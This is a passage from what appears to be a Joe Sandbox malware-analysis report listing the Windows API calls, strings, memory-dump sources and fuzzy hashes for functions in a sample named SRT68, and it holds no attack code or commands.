                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0100D840
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0100D847
                                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0100D87E
                                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 0100D880
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                      • String ID:
                                                                      • API String ID: 1246142700-0
                                                                      • Opcode ID: b72896bc8e4fecf03a563238b4a521ec487cf56b425c294d2ff3480f960cb389
                                                                      • Instruction ID: 9ba34da364805203c632b2937b7978b16b6acb29e35df0a6292eb3acdae3ea17
                                                                      • Opcode Fuzzy Hash: b72896bc8e4fecf03a563238b4a521ec487cf56b425c294d2ff3480f960cb389
                                                                      • Instruction Fuzzy Hash: A0B11A75A00109AFDB14DFA4CC84DAEBBB9FF49314F1480A9E949EB251DB74EE41CB60
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00FFC283
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00FFC295
                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00FFC2F3
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00FFC2FE
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00FFC310
                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00FFC364
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00FFC372
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00FFC383
                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00FFC3C6
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00FFC3D4
                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FFC3F1
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00FFC3FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: abe5dec65f2f9b2ae08b0daf141aa54be96f6efda2ca970c901b93221ebecb0d
                                                                      • Instruction ID: b9b96edc6179990c54d591a34d094dd853c0baaddbec63c1f7aa103c286ded65
                                                                      • Opcode Fuzzy Hash: abe5dec65f2f9b2ae08b0daf141aa54be96f6efda2ca970c901b93221ebecb0d
                                                                      • Instruction Fuzzy Hash: 16513F71B00209ABDB28CFB9DD89AAEBBB6FF88750F14812DF615D7294D7719D008B50
                                                                      APIs
                                                                        • Part of subcall function 00FA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FA2036,?,00000000,?,?,?,?,00FA16CB,00000000,?), ref: 00FA1B9A
                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00FA20D3
                                                                      • KillTimer.USER32(-00000001,?,?,?,?,00FA16CB,00000000,?,?,00FA1AE2,?,?), ref: 00FA216E
                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00FDBCA6
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FA16CB,00000000,?,?,00FA1AE2,?,?), ref: 00FDBCD7
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FA16CB,00000000,?,?,00FA1AE2,?,?), ref: 00FDBCEE
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FA16CB,00000000,?,?,00FA1AE2,?,?), ref: 00FDBD0A
                                                                      • DeleteObject.GDI32(00000000), ref: 00FDBD1C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 641708696-0
                                                                      • Opcode ID: 9fdb8bec29506812e8c02634006e9a7e96a8848935009c559c1541bf37527300
                                                                      • Instruction ID: fc49ccbcbd08a5ee7134db09cf954bb13c01b46d9494f2e628d8057863ad3e49
                                                                      • Opcode Fuzzy Hash: 9fdb8bec29506812e8c02634006e9a7e96a8848935009c559c1541bf37527300
                                                                      • Instruction Fuzzy Hash: E161B171A10601DFCB359F18D948B29B7F2FF41362F248519E4829BA64C77AA891EF90
                                                                      APIs
                                                                        • Part of subcall function 00FA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FA25EC
                                                                      • GetSysColor.USER32(0000000F), ref: 00FA21D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ColorLongWindow
                                                                      • String ID:
                                                                      • API String ID: 259745315-0
                                                                      • Opcode ID: 5afc8e83529b33064d43497682a61c5b032ffa2d86dcb2f3df1a70686d747f0e
                                                                      • Instruction ID: 16d667939f0c9c6b8db40b5e6ab860ce7f1073901231d50467a765d4c086a349
                                                                      • Opcode Fuzzy Hash: 5afc8e83529b33064d43497682a61c5b032ffa2d86dcb2f3df1a70686d747f0e
                                                                      • Instruction Fuzzy Hash: AD41A371600140DFEB715F2CD888BB93BA6EB07371F284255FEA58A1E5C7368C42EB21
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?,0102F910), ref: 0100A90B
                                                                      • GetDriveTypeW.KERNEL32(00000061,010589A0,00000061), ref: 0100A9D5
                                                                      • _wcscpy.LIBCMT ref: 0100A9FF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 2820617543-1000479233
                                                                      • Opcode ID: 453bb1ccf36bef424c12aa6e24da55263924676266cc21a88b76c2bcc2fbf508
                                                                      • Instruction ID: d3bd3960dac38eff9a7973133ceefd3b3288cb7aef860f41b2060735376026f9
                                                                      • Opcode Fuzzy Hash: 453bb1ccf36bef424c12aa6e24da55263924676266cc21a88b76c2bcc2fbf508
                                                                      • Instruction Fuzzy Hash: DA51BC71218301EBD301EF18CD92AAFB7E5EF86340F04482DF9D65B2E2DB759909CA52
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __i64tow__itow__swprintf
                                                                      • String ID: %.15g$0x%p$False$True
                                                                      • API String ID: 421087845-2263619337
                                                                      • Opcode ID: 55e0723fec7b4d232c56d3e852283f4c2bd7b9fd04d17a21b948ae59bdd2b41b
                                                                      • Instruction ID: 1e4b7c554c1f4a9cb0b7b077cbd87225f7af7c60b4ad9d130356e7dff1eb3657
                                                                      • Opcode Fuzzy Hash: 55e0723fec7b4d232c56d3e852283f4c2bd7b9fd04d17a21b948ae59bdd2b41b
                                                                      • Instruction Fuzzy Hash: 8B41E6729042069FDB24DF34ED42F7A73E9EF46310F28447EE54ADB241EA759906BB10
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0102716A
                                                                      • CreateMenu.USER32 ref: 01027185
                                                                      • SetMenu.USER32(?,00000000), ref: 01027194
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01027221
                                                                      • IsMenu.USER32(?), ref: 01027237
                                                                      • CreatePopupMenu.USER32 ref: 01027241
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0102726E
                                                                      • DrawMenuBar.USER32 ref: 01027276
                                                                      Similarity
                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                      • String ID: 0$F
                                                                      • API String ID: 176399719-3044882817
                                                                      • Opcode ID: b0caeb7f7dbda9b35382afc8f864f8326dd5990b6cd473a1ebd9d40fa33a624e
                                                                      • Instruction ID: a513c2f9c7270810678c9d3371271d821b276185a999d22c2c6534a47593c08b
                                                                      • Opcode Fuzzy Hash: b0caeb7f7dbda9b35382afc8f864f8326dd5990b6cd473a1ebd9d40fa33a624e
                                                                      • Instruction Fuzzy Hash: 20418974A01215EFEB20DF68D984E9ABBF5FF59340F140068FA85A7351D736A914CFA0
                                                                      APIs
                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0102755E
                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 01027565
                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 01027578
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 01027580
                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0102758B
                                                                      • DeleteDC.GDI32(00000000), ref: 01027594
                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0102759E
                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 010275B2
                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 010275BE
                                                                      Similarity
                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                      • String ID: static
                                                                      • API String ID: 2559357485-2160076837
                                                                      • Opcode ID: b4939d886d49ceb6db7ac058b96c545252ce8e30576c4b775223a0cdb860e679
                                                                      • Instruction ID: 6fd77606cb6ed328d2450e37bad15d2da4f27a3a1bd807d3003c4507db854c0d
                                                                      • Opcode Fuzzy Hash: b4939d886d49ceb6db7ac058b96c545252ce8e30576c4b775223a0cdb860e679
                                                                      • Instruction Fuzzy Hash: F4318E31100226ABDF229F64DC08FDA7BB9FF097A0F210219FA9596090C77AD811DBA4
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00FC6E3E
                                                                        • Part of subcall function 00FC8B28: __getptd_noexit.LIBCMT ref: 00FC8B28
                                                                      • __gmtime64_s.LIBCMT ref: 00FC6ED7
                                                                      • __gmtime64_s.LIBCMT ref: 00FC6F0D
                                                                      • __gmtime64_s.LIBCMT ref: 00FC6F2A
                                                                      • __allrem.LIBCMT ref: 00FC6F80
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC6F9C
                                                                      • __allrem.LIBCMT ref: 00FC6FB3
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC6FD1
                                                                      • __allrem.LIBCMT ref: 00FC6FE8
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC7006
                                                                      • __invoke_watson.LIBCMT ref: 00FC7077
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                      • String ID:
                                                                      • API String ID: 384356119-0
                                                                      • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                      • Instruction ID: cac94c8c6d97800e2e071aff3711e220e0ac3d9cd1bea5adca15cea0b4c8af87
                                                                      • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                      • Instruction Fuzzy Hash: F6712576E44717ABD714EE28DD43F5AB7A9AF04324F14822EF514D7281E774ED00AB90
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 01002542
                                                                      • GetMenuItemInfoW.USER32(01065890,000000FF,00000000,00000030), ref: 010025A3
                                                                      • SetMenuItemInfoW.USER32(01065890,00000004,00000000,00000030), ref: 010025D9
                                                                      • Sleep.KERNEL32(000001F4), ref: 010025EB
                                                                      • GetMenuItemCount.USER32(?), ref: 0100262F
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0100264B
                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 01002675
                                                                      • GetMenuItemID.USER32(?,?), ref: 010026BA
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01002700
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01002714
                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01002735
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                      • String ID:
                                                                      • API String ID: 4176008265-0
                                                                      • Opcode ID: 5150206706a51ccf7fec251efa57efd131ba14df1189b7810549bb6e1d9490e1
                                                                      • Instruction ID: 581622b4c28afc3b932aeed21c887cd761b34a360bbdea9bca351099c247b597
                                                                      • Opcode Fuzzy Hash: 5150206706a51ccf7fec251efa57efd131ba14df1189b7810549bb6e1d9490e1
                                                                      • Instruction Fuzzy Hash: 0861947050024AAFFB22DF68DC8CDBE7BB8FB45344F140099E982A3291D736A905DB21
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01026FA5
                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01026FA8
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 01026FCC
                                                                      • _memset.LIBCMT ref: 01026FDD
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01026FEF
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01027067
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow_memset
                                                                      • String ID:
                                                                      • API String ID: 830647256-0
                                                                      • Opcode ID: a74dd94033a115203115e3a9f987ce17b3961bec496d66cd2a9210978a636f0d
                                                                      • Instruction ID: c6c8c0bc6a91702a2abda6419026c5ae09e80259ad435aba3408df78e9c5c42e
                                                                      • Opcode Fuzzy Hash: a74dd94033a115203115e3a9f987ce17b3961bec496d66cd2a9210978a636f0d
                                                                      • Instruction Fuzzy Hash: 82619F75900218EFDB21DFA8CC80EEE77F9EF09700F100199FA94AB2A1C775A945CB90
                                                                      APIs
                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FF6BBF
                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00FF6C18
                                                                      • VariantInit.OLEAUT32(?), ref: 00FF6C2A
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00FF6C4A
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00FF6C9D
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00FF6CB1
                                                                      • VariantClear.OLEAUT32(?), ref: 00FF6CC6
                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00FF6CD3
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FF6CDC
                                                                      • VariantClear.OLEAUT32(?), ref: 00FF6CEE
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FF6CF9
                                                                      Similarity
                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                      • String ID:
                                                                      • API String ID: 2706829360-0
                                                                      • Opcode ID: fea6a7ce6e44ae88c3cc589d889de1511909efce99ecd088d81f491e2162c273
                                                                      • Instruction ID: 8ae6bc7202f448265924638e9e16372a71ef7c9aae276106fcd7337c166225a2
                                                                      • Opcode Fuzzy Hash: fea6a7ce6e44ae88c3cc589d889de1511909efce99ecd088d81f491e2162c273
                                                                      • Instruction Fuzzy Hash: CB418171A0011D9FCF10DFA8D8449ADBBB9EF08351F108069FA95E7261CF75AA45DFA0
                                                                      APIs
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      • CoInitialize.OLE32 ref: 01018403
                                                                      • CoUninitialize.OLE32 ref: 0101840E
                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,01032BEC,?), ref: 0101846E
                                                                      • IIDFromString.OLE32(?,?), ref: 010184E1
                                                                      • VariantInit.OLEAUT32(?), ref: 0101857B
                                                                      • VariantClear.OLEAUT32(?), ref: 010185DC
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                      • API String ID: 834269672-1287834457
                                                                      • Opcode ID: 63b6634fcf72d0885f481c777358da2b7e245721b2415d556a45f793fd371d2b
                                                                      • Instruction ID: 897fc17f8cf10ec6d57a1eb8aa4b01478b0fe54be18ca88aed40e457f6cdf7ad
                                                                      • Opcode Fuzzy Hash: 63b6634fcf72d0885f481c777358da2b7e245721b2415d556a45f793fd371d2b
                                                                      • Instruction Fuzzy Hash: EE619A706083129FD711DF54C848B6EBBE8EF49754F04845EFAC29B295CB78EA44CB92
                                                                      APIs
                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 01015793
                                                                      • inet_addr.WSOCK32(?,?,?), ref: 010157D8
                                                                      • gethostbyname.WSOCK32(?), ref: 010157E4
                                                                      • IcmpCreateFile.IPHLPAPI ref: 010157F2
                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01015862
                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01015878
                                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 010158ED
                                                                      • WSACleanup.WSOCK32 ref: 010158F3
                                                                      Similarity
                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                      • String ID: Ping
                                                                      • API String ID: 1028309954-2246546115
                                                                      • Opcode ID: da48a177ca712bb46fa627ae27ccc4ea1291c444f2bed792d6284f3fbeb77102
                                                                      • Instruction ID: d52cf19432de51dbdede2190b6320cf10555723fe682f3c8cb75efd34091e3f1
                                                                      • Opcode Fuzzy Hash: da48a177ca712bb46fa627ae27ccc4ea1291c444f2bed792d6284f3fbeb77102
                                                                      • Instruction Fuzzy Hash: 1651B1716043019FDB20DF28DC46B2ABBE4EF8A710F044569F996EB295DB78E800DB52
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0100B4D0
                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0100B546
                                                                      • GetLastError.KERNEL32 ref: 0100B550
                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0100B5BD
                                                                      Similarity
                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                      • API String ID: 4194297153-14809454
                                                                      • Opcode ID: f09333af6b80af3444755e5ef2af148df39a2449ec5eb6d50dc60a482658f905
                                                                      • Instruction ID: 7b11e9badf09275f4636cd53ead672d6c1cad404faa4da42d826f5ea156d8517
                                                                      • Opcode Fuzzy Hash: f09333af6b80af3444755e5ef2af148df39a2449ec5eb6d50dc60a482658f905
                                                                      • Instruction Fuzzy Hash: 8F31A579A002059FE751DF68CC45FAE7BB4FF09301F1441AAE941EB2D1DB769901CB51
APIs
  • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
  • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00FF9014
• GetDlgCtrlID.USER32 ref: 00FF901F
• GetParent.USER32 ref: 00FF903B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00FF903E
• GetDlgCtrlID.USER32(?), ref: 00FF9047
• GetParent.USER32(?), ref: 00FF9063
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00FF9066
Memory Dump Source
• Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Opcode ID: e258aa6022531639acf7694555ef7ff140cb6c338ae64681e173cd5c90b627f4
• Instruction ID: 9c04a728a7c92de148ed8de90209ac7b5518a2db9afeb5e1a357ff38f3ef0cd8
• Opcode Fuzzy Hash: e258aa6022531639acf7694555ef7ff140cb6c338ae64681e173cd5c90b627f4
• Instruction Fuzzy Hash: 7C21B2B4A00109BBDF24AFB0CC85EBEBB74EF49350F100119FA61972A1DB795819EB20
APIs
  • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
  • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00FF90FD
• GetDlgCtrlID.USER32 ref: 00FF9108
• GetParent.USER32 ref: 00FF9124
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00FF9127
• GetDlgCtrlID.USER32(?), ref: 00FF9130
• GetParent.USER32(?), ref: 00FF914C
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00FF914F
Memory Dump Source
• Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Opcode ID: df942b168750c14fa78e23003996c72a06521ef01d033f294ea5f8ac35db0625
• Instruction ID: 21126cf7a5dffb3d16521d806bc0b9b64cf3cc102e3921c643cee19bbd8b6567
• Opcode Fuzzy Hash: df942b168750c14fa78e23003996c72a06521ef01d033f294ea5f8ac35db0625
• Instruction Fuzzy Hash: D121C4B4A00109BBDF20AFA0CC89FFEBB74EF49300F100019FA51972A5DB794419EB20
APIs
• GetParent.USER32 ref: 00FF916F
• GetClassNameW.USER32(00000000,?,00000100), ref: 00FF9184
• _wcscmp.LIBCMT ref: 00FF9196
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FF9211
Memory Dump Source
• Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
• Opcode ID: 10448e0397efa43b7109d49a2247fd53d8047e6f9ff7279e0bda7e6ffc7f862e
• Instruction ID: 6c67cc9efbb5526c374b58321db88cf62953f8bf1af7e60aca7260a4531dc07b
• Opcode Fuzzy Hash: 10448e0397efa43b7109d49a2247fd53d8047e6f9ff7279e0bda7e6ffc7f862e
• Instruction Fuzzy Hash: FA11A73B64C30BB9EB252525DC0BFB737ACDF15770B20002AFE00E54B5EEA659517694
APIs
• VariantInit.OLEAUT32(?), ref: 010188D7
• CoInitialize.OLE32(00000000), ref: 01018904
• CoUninitialize.OLE32 ref: 0101890E
• GetRunningObjectTable.OLE32(00000000,?), ref: 01018A0E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 01018B3B
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01032C0C), ref: 01018B6F
• CoGetObject.OLE32(?,00000000,01032C0C,?), ref: 01018B92
• SetErrorMode.KERNEL32(00000000), ref: 01018BA5
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01018C25
• VariantClear.OLEAUT32(?), ref: 01018C35
Memory Dump Source
• Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
